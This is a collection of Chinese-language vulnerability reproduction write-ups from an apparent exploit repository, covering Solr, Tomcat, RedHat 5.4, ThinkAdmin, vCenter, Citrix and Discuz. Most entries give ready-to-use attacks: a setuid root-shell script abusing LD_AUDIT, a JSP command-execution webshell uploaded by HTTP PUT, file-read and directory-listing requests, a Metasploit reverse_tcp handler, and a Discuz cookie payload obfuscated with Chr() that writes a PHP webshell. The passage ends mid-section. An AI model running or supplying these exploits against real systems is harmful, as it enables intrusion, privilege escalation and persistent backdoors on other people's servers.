exploit/multi/handler 29 | set payload java/meterpreter/reverse_tcp 30 | set lhost 172.16.35.128 31 | set lport 9999 32 | run 33 | 浏览器访问http://172.16.35.131:8081/ 后点击下图所示 34 | ![image](./2.png) 35 | 再点击下图所示 36 | ![image](./3.png) 37 | 此时,meterpreter已经收到session,如下图 38 | ![image](./4.png) 39 | 40 | # 0x05 踩坑记录 41 | 无 42 | 43 | # 0x06 参考链接 44 | 无 45 | -------------------------------------------------------------------------------- /2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/1.png -------------------------------------------------------------------------------- /2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/2.png -------------------------------------------------------------------------------- /2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:本地搭建的环境 3 | 复现版本:Solr 8.2.0 4 | 5 | # 0x01 环境搭建 6 | 目标环境:centos7_x64_en-us + solr-8.2.0.tgz + openjdk version "1.8.0_181" 7 | wget https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.tgz 8 | tar -xvf ./solr-8.2.0.tgz 9 | cd ./solr-8.2.0.tgz/bin/ 10 | ./solr start -force#默认启动端口8983 11 | 启动后浏览器访问http://127.0.0.1:8983/ ,出现下图所示表示环境配置完成: 12 | ![image](./1.png) 13 | 14 | # 0x02 利用条件 15 | 无 16 | 17 | # 0x03 影响版本 18 | Solr 8.1.1 19 | Solr 8.2.0 20 | 21 | # 0x04 漏洞复现 22 | 攻击环境:kali2020 + msf5 23 | msfconsole 24 | use exploit/multi/misc/java_jmx_server 25 | set rhosts 172.16.35.138 26 | set rport 18983 27 | run 28 | ![image](./2.png) 29 | 30 | # 0x05 踩坑记录 31 | 坑1: 32 | 在kali下搭建的漏洞环境run多次后一直失败,经查看发现kali下的java版本是openjdk version "11.0.6" 2020-01-14,怀疑可能是java版本过高导致的利用失败,故在ubuntu16.04_x64_en-us下使用java8重新搭建solr-8.2.0.zip,漏洞利用成功。看过别人在java10下也有利用成功的文章,怀疑可能exp针对java10及以下的版本才有效。 33 | 坑2: 34 | centos7下默认开启防火墙,需要临时关闭防火墙:“systemctl stop firewalld” 35 | 36 | # 0x06 参考链接 37 | https://github.com/jas502n/CVE-2019-12409 38 | -------------------------------------------------------------------------------- /2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/b1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/b1.png -------------------------------------------------------------------------------- /2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/cve-2010-3847.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo wait 3 | cat > a.c << _EOF 4 | void __attribute__((constructor)) init() 5 | { 6 | setuid(0); 7 | system("/bin/bash"); 8 | } 9 | _EOF 10 | mkdir /tmp/lenis 11 | ln /bin/ping /tmp/lenis/target 12 | exec 3< /tmp/lenis/target 13 | rm -rf /tmp/lenis/ 14 | gcc -w -fPIC -shared -o /tmp/lenis a.c 15 | rm -r a.c 16 | LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 -------------------------------------------------------------------------------- /2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:实战中的环境 3 | 复现版本:Red Hat 5.4(linux 2.6.18-164.el5) 4 | 5 | # 0x01 环境搭建 6 | 无 7 | 8 | # 0x02 利用条件 9 | 无 10 | 11 | # 0x03 影响版本 12 | Red Hat Enterprise Linux Server release 5.4 (Tikanga) 13 | 14 | # 0x04 漏洞复现 15 | cat /etc/redhat-release 16 | Red Hat Enterprise Linux Server release 5.4 (Tikanga) 17 | uname -a 18 | Linux dongda97.dong-da.com 2.6.18-164.el5 #1 SMP Tue Aug 18 15:51:48 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux 19 | 20 | 直接执行脚本: 21 | bash ./cve-2010-3847.sh 22 | 执行后会反弹root权限的shell,如下图: 23 | ![image](./b1.png) 24 | 25 | # 0x05 踩坑记录 26 | 无 27 | 28 | # 0x06 参考链接 29 | 无 30 | -------------------------------------------------------------------------------- /2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f0.png -------------------------------------------------------------------------------- /2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f1.png -------------------------------------------------------------------------------- /2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/120 3 | 复现版本:Tomcat 7.0.79 4 | 5 | # 0x01 环境搭建 6 | 无 7 | 8 | # 0x02 利用条件 9 | 安装在Windows下 10 | 11 | # 0x03 影响版本 12 | 7.0.0 <= Tomcat <= 7.0.79 13 | 14 | # 0x04 漏洞复现 15 | 攻击环境:kali2020 16 | 17 | 访问目标地址,burp抓包,改包如下: 18 | ``` 19 | PUT /cmd.jsp// HTTP/1.1 20 | Host: 219.153.49.228:45174 21 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 23 | Accept-Language: en-US,en;q=0.5 24 | Accept-Encoding: gzip, deflate 25 | Connection: close 26 | Upgrade-Insecure-Requests: 1 27 | Pragma: no-cache 28 | Cache-Control: no-cache 29 | Content-Length: 313 30 | 31 | <% 32 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 33 | int a = -1; 34 | byte[] b = new byte[2048]; 35 | out.print("
");
36 |         while((a=in.read(b))!=-1){
37 |             out.println(new String(b));
38 |         }
39 |         out.print("
"); 40 | %> 41 | ``` 42 | Send后,返回如下,返回“HTTP/1.1 201 Created”表示文件创建成功 43 | ![image](./f0.png) 44 | 访问如下URL:http://219.153.49.228:45174/cmd.jsp?cmd=cat%20/key.txt 后,返回执行命令后的结果 45 | ![image](./f1.png) 46 | 47 | # 0x05 踩坑记录 48 | 无 49 | 50 | # 0x06 参考链接 51 | 无 52 | -------------------------------------------------------------------------------- /2020_10_15_(未复现)VMware vCenter未验证的任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | POC: 2 | /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 3 | 4 | 已知影响版本:VMware vCenter 6.5.0a-f 5 | 安全版本:VMware vCenter 6.5.0u1 6 | 7 | 有人提到:vCenter 5.5+Windows Server 2012下复现失败 8 | 9 | 参考链接: 10 | https://twitter.com/ptswarm/status/1316016337550938122 11 | -------------------------------------------------------------------------------- /2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/0.png -------------------------------------------------------------------------------- /2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/1.png -------------------------------------------------------------------------------- /2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/2.png -------------------------------------------------------------------------------- /2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | 基于ThinkPHP,专注于微信领域后台管理的一款开发框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:2020.08.03.1之前的某一个v6版本:https://github.com/179776823/ThinkAdmin 7 | 8 | # 0x02 环境搭建 9 | 目标环境:2008_r2_standard_zh-chs + phpstudy + https://github.com/179776823/ThinkAdmin 10 | 11 | composer config -g repo.packagist composer https://mirrors.aliyun.com/composer #使用阿里云的源更快一些 12 | https://github.com/179776823/ThinkAdmin #下载有漏洞的v6版本到phpstudy的对应目录下 13 | cd ThinkAdmin 14 | composer install 15 | create database admin_v6; 16 | create user 'admin_v6'@'localhost' identified by 'FbYBHcWKr2';#用户名密码来自config\database.php 17 | grant all on admin_v6.* to 'admin_v6'@'localhost'; 18 | use admin_v6; 19 | source C:\phpstudy_pro\WWW\ThinkAdmin-6\admin_v6.sql;#将数据导入数据库 20 | 访问:http://127.0.0.1:81/ThinkAdmin-6/public/index.php 21 | 参考链接: 22 | https://mp.weixin.qq.com/s/MjU6u_eTsdH-nwQAgbxLRw 23 | https://thinkadmin.top/install 24 | https://www.cnblogs.com/Dot-Boy/archive/2008/08/04/1260185.html 25 | https://www.jianshu.com/p/d7b9c468f20d 26 | https://github.com/xuxuedong/personal-note/tree/master/2020_10_18_%E7%BD%91%E7%AB%99%E6%90%AD%E5%BB%BA%E4%BB%8E%E5%A4%B4%E8%AE%B0%E5%BD%95 27 | 28 | # 0x03 利用条件 29 | 无 30 | 31 | # 0x04 影响版本 32 | 漏洞发现者原话:2020.08.03.01,≤这个版本的都有可能存在漏洞 33 | 参考链接: 34 | https://github.com/zoujingli/ThinkAdmin/issues/244 35 | 36 | # 0x05 漏洞复现 37 | 攻击环境:Kali-Linux-2020.2-vmware-amd64 + Burp_Suite_Pro_v2020.5.1 38 | 39 | 列目录漏洞复现: 40 | 访问:http://192.168.149.133:81/ThinkAdmin-6/public/index.php/admin/login.html 41 | burp抓包,将数据包修改如下: 42 | ``` 43 | POST /ThinkAdmin-6/public/index.php/admin/login.html?s=admin/api.Update/node HTTP/1.1 44 | Host: 127.0.0.1 45 | Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 46 | Connection: close 47 | Content-Type: application/x-www-form-urlencoded 48 | Content-Length: 22 49 | 50 | rules=%5B%22.%2F%22%5D 51 | ``` 52 | 成功列出了目录,如下图 53 | ![image](./0.png) 54 | 55 | 任意文件读取漏洞复现: 56 | 在网站根目录(C:\phpstudy_pro\WWW\ThinkAdmin-6\)下创建一个文件,名为1.txt,内容为:lalala 57 | 在攻击机的浏览器中访问:http://192.168.149.133:81/ThinkAdmin-6/public/index.php?s=admin/api.Update/get/encode/1d1a383c38 58 | 其中“1d1a383c38”是“1.txt”经下列函数编码后得到的 59 | ``` 60 | 12 |      13 |         

14 |          18 |      19 | 20 | ``` 21 | 手机和电脑处于同一局域网,微信客户端访问上述网页地址,成功获取到User-Agent,如下图 22 | ![image](./2.png) 23 | User-Agent如下 24 | ``` 25 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.12(0x17000c27) NetType/WIFI Language/zh_CN 26 | ``` 27 | 可留做以后使用 28 | 29 | # 0x02 为chrome浏览器配置User-Agent 30 | chrome下按F12(或ctrl+shift+i)打开开发者工具,按customize and control devtools即下图中红色圈出来的部分(或ctrl+shift+p)打开命令搜索框 31 | ![image](./3.png) 32 | 输入network conditions,并选择,如下图 33 | ![image](./4.png) 34 | 取消勾选automatically,并在User Agent处填入“micromessenger”,不要关闭开发者工具,否则所做的更改会失效,再次访问被微信限制的页面,能够成功访问页面 35 | 36 | # 0x03 注意 37 | 如果你要打开的网址是以 https://open.weixin.qq.com/ 开头的,那么它使用的是微信开放平台,需要使用你的微信帐户信息。这种方式不适用。 38 | -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/WebSocketClient.js: -------------------------------------------------------------------------------- 1 | class WebSocketClient { 2 | 3 | constructor(protocol, hostname, port, endpoint) { 4 | 5 | this.webSocket = null; 6 | 7 | this.protocol = protocol; 8 | this.hostname = hostname; 9 | this.port = port; 10 | this.endpoint = endpoint; 11 | } 12 | 13 | getServerUrl() { 14 | return this.protocol + "://" + this.hostname + ":" + this.port + this.endpoint; 15 | } 16 | 17 | connect() { 18 | try { 19 | this.webSocket = new WebSocket(this.getServerUrl()); 20 | 21 | // 22 | // Implement WebSocket event handlers! 23 | // 24 | this.webSocket.onopen = function(event) { 25 | console.log('onopen::' + JSON.stringify(event, null, 4)); 26 | } 27 | 28 | this.webSocket.onmessage = function(event) { 29 | var msg = event.data; 30 | console.log('onmessage::' + JSON.stringify(msg, null, 4)); 31 | } 32 | this.webSocket.onclose = function(event) { 33 | console.log('onclose::' + JSON.stringify(event, null, 4)); 34 | } 35 | this.webSocket.onerror = function(event) { 36 | console.log('onerror::' + JSON.stringify(event, null, 4)); 37 | } 38 | 39 | } catch (exception) { 40 | console.error(exception); 41 | } 42 | } 43 | 44 | getStatus() { 45 | return this.webSocket.readyState; 46 | } 47 | 48 | send(message) { 49 | 50 | if (this.webSocket.readyState == WebSocket.OPEN) { 51 | this.webSocket.send(message); 52 | 53 | } else { 54 | console.error('webSocket is not open. readyState=' + this.webSocket.readyState); 55 | } 56 | } 57 | 58 | disconnect() { 59 | if (this.webSocket.readyState == WebSocket.OPEN) { 60 | this.webSocket.close(); 61 | 62 | } else { 63 | console.error('webSocket is not open. readyState=' + this.webSocket.readyState); 64 | } 65 | } 66 | } 67 | 68 | var client = new WebSocketClient('ws', '172.16.35.133', 8080, '/DemoOne/endpoint'); 69 | 70 | client.connect(); 71 | -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/WebSocketServlet.java: -------------------------------------------------------------------------------- 1 | package com.pegaxchange.java.web; 2 | 3 | import java.io.IOException; 4 | import java.util.List; 5 | import java.util.Map; 6 | 7 | import javax.websocket.OnClose; 8 | import javax.websocket.OnError; 9 | import javax.websocket.OnMessage; 10 | import javax.websocket.OnOpen; 11 | import javax.websocket.Session; 12 | import javax.websocket.server.ServerEndpoint; 13 | 14 | @ServerEndpoint("/endpoint") 15 | public class WebSocketServlet { 16 | 17 | @OnOpen 18 | public void onOpen(Session session) { 19 | System.out.println( "onOpen::" + session.getId() ); 20 | } 21 | 22 | @OnClose 23 | public void onClose(Session session) { 24 | System.out.println( "onClose::" + session.getId() ); 25 | } 26 | 27 | @OnMessage 28 | public void onMessage(String message, Session session) { 29 | System.out.println("onMessage::From=" + session.getId() + " Message=" + message); 30 | try { 31 | session.getBasicRemote().sendText("Hello Client " + session.getId() + "!"); 32 | } catch (IOException e) { 33 | e.printStackTrace(); 34 | } 35 | } 36 | 37 | @OnError 38 | public void onError(Throwable t) { 39 | System.out.println("onError::" + t.getMessage()); 40 | } 41 | } -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a0.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a1.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a2.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a3.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/b.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/c.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/d.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/d.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/e.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/f.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Tomcat:一款流行的java web应用服务器 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:apache-tomcat-8.5.56 7 | 8 | # 0x02 环境搭建 9 | 靶机系统:2008_r2_standard_zh-chs 10 | 11 | 下载并解压apache-tomcat-8.5.56 12 | 进入目录bin并执行startup.bat,出现“Server startup in xx ms”,通常表示启动成功,如下图 13 | ![image](./a.png) 14 | 访问[http://172.16.35.133:8080/](http://172.16.35.133:8080/),确认服务成功启动,如下图 15 | ![image](./b.png) 16 | 接下来需要操作如下8个步骤: 17 | 1、JDK安装配置 18 | 2、Apache Tomcat安装配置 19 | 3、Eclipse IDE for Java EE安装配置 20 | 4、Tomcat运行时环境在Eclipse IDE for Java EE中配置 21 | 5、Eclipse中建立动态web项目 22 | 6、创建"Hello World" Servlet和JSP视图 23 | 7、在Eclipse中运行动态web项目 24 | 8、导出为WAR文件并部署到Tomcat中 25 | 写好的websocket应用见文件WebSocketServlet.java,部署好的websocket应用见下图 26 | ![image](./a0.png) 27 | 在火狐浏览器的开发者工具的控制台中依次执行WebSocketClient.js中的javascript代码,当执行完“client.connect();”,eclipse中tomcat控制台出现“onOpen::0”时,表示websocket应用部署成功,如下图 28 | ![image](./a1.png) 29 | 导出为DemoTwo.war并部署到tomcat中 30 | 31 | # 0x03 利用条件 32 | Tomcat上部署了WebSocket应用 33 | 34 | # 0x04 影响版本 35 | 9.0.0.M1 <= apache tomcat <= 9.0.36 36 | 10.0.0-M1 <= apache tomcat <= 10.0.0-M6 37 | 8.5.0 <= apache tomcat <= 8.5.56 38 | 7.0.27 <= apache tomcat <= 7.0.104 39 | 40 | # 0x05 漏洞复现 41 | 攻击系统:Kali-Linux-2020.2-vmware-amd64 42 | 43 | 复现针对自己编写的websocket应用: 44 | 执行如下命令: 45 | git clone https://github.com/RedTeamPentesting/CVE-2020-13935 46 | cd CVE-2020-13935 47 | go build 48 | ./tcdos ws://172.16.35.133:8080/DemoTwo/endpoint 49 | 执行后靶机系统CPU骤升到100%,如下图 50 | ![image](./a2.png) 51 | 此时,tomcat管理控制台显示如下 52 | ![image](./a3.png) 53 | 54 | 复现针对自带的websocket应用: 55 | 首先访问[http://172.16.35.133:8080/examples/websocket/](http://172.16.35.133:8080/examples/websocket/)确认存在WebSocket应用,如下图 56 | ![image](./f.png) 57 | 执行如下命令: 58 | ./tcdos ws://172.16.35.133:8080/examples/websocket/echoProgrammatic 59 | 执行后靶机系统CPU骤升到100%,如下图 60 | ![image](./c.png) 61 | 62 | # 0x06 踩坑记录 63 | 坑1: 64 | 执行go build后,可能会报如下错误 65 | ![image](./d.png) 66 | 此时需要一些合理上网方式,成功执行后如下图 67 | ![image](./e.png) 68 | 69 | # 0x07 参考链接 70 | https://www.anquanke.com/post/id/221861 71 | https://github.com/RedTeamPentesting/CVE-2020-13935 72 | https://www.pegaxchange.com/2018/01/28/websocket-server-java/ 73 | https://www.pegaxchange.com/2016/09/02/java-eclipse-tomcat/ 74 | https://www.cnblogs.com/xdp-gacl/p/5193279.html 75 | https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ 76 | -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/tcdos: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/tcdos -------------------------------------------------------------------------------- /2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/0.png -------------------------------------------------------------------------------- /2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/CVE-2019-19781.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/CVE-2019-19781.zip -------------------------------------------------------------------------------- /2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Citrix:可以简单理解为从外网接入的公司的VPN设备,或网络出口的路由器设备等 3 | 4 | # 0x01 复现环境 5 | 使用环境:测试环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 无 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24 16 | NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18 17 | NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13 18 | NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15 19 | NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12 20 | Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 21 | 22 | # 0x05 漏洞复现 23 | 攻击环境:kali_x64_en-us 24 | 25 | git clone https://github.com/projectzeroindia/CVE-2019-19781 26 | cd ./CVE-2019-19781 27 | bash CVE-2019-19781.sh x.x.x.x 'ls' 28 | 如下图 29 | ![image](./0.png) 30 | 31 | # 0x06 踩坑记录 32 | 无 33 | 34 | # 0x07 参考链接 35 | 无 36 | -------------------------------------------------------------------------------- /2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行/0.png -------------------------------------------------------------------------------- /2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Discuz:一款流行的论坛程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 切换到对应目录下 12 | docker-compose up -d 13 | 启动后,访问[http://172.16.35.128:8080/install/](http://172.16.35.128:8080/install/)来安装discuz,数据库地址填写db,数据库名为discuz,数据库账号密码均为root 14 | 15 | # 0x03 利用条件 16 | 无 17 | 18 | # 0x04 影响版本 19 | Discuz 7.x 6.x 20 | 21 | # 0x05 漏洞复现 22 | 攻击环境:kali_x64_en-us 23 | 24 | 安装成功后,直接找一个已存在的帖子,向其发送数据包,将Cookie中的数据改为 25 | ``` 26 | GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 27 | ``` 28 | 请求如下 29 | ``` 30 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 31 | Host: 172.16.35.128:8080 32 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 34 | Accept-Language: en-US,en;q=0.5 35 | Accept-Encoding: gzip, deflate 36 | Referer: http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 37 | Connection: close 38 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 39 | Upgrade-Insecure-Requests: 1 40 | Pragma: no-cache 41 | Cache-Control: no-cache 42 | ``` 43 | 返回如下图 44 | ![image](./0.png) 45 | 46 | 想getshell可将Cookie中的内容变为 47 | ``` 48 | GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 49 | ``` 50 | 发送的请求如下 51 | ``` 52 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 53 | Host: 172.16.35.128:8080 54 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 55 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 56 | Accept-Language: en-US,en;q=0.5 57 | Accept-Encoding: gzip, deflate 58 | Referer: http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 59 | Connection: close 60 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 61 | Upgrade-Insecure-Requests: 1 62 | Pragma: no-cache 63 | Cache-Control: no-cache 64 | ``` 65 | 然后可使用蚁剑连接,地址http://172.16.35.128:8080/wf.php 密码lalala 66 | 67 | # 0x06 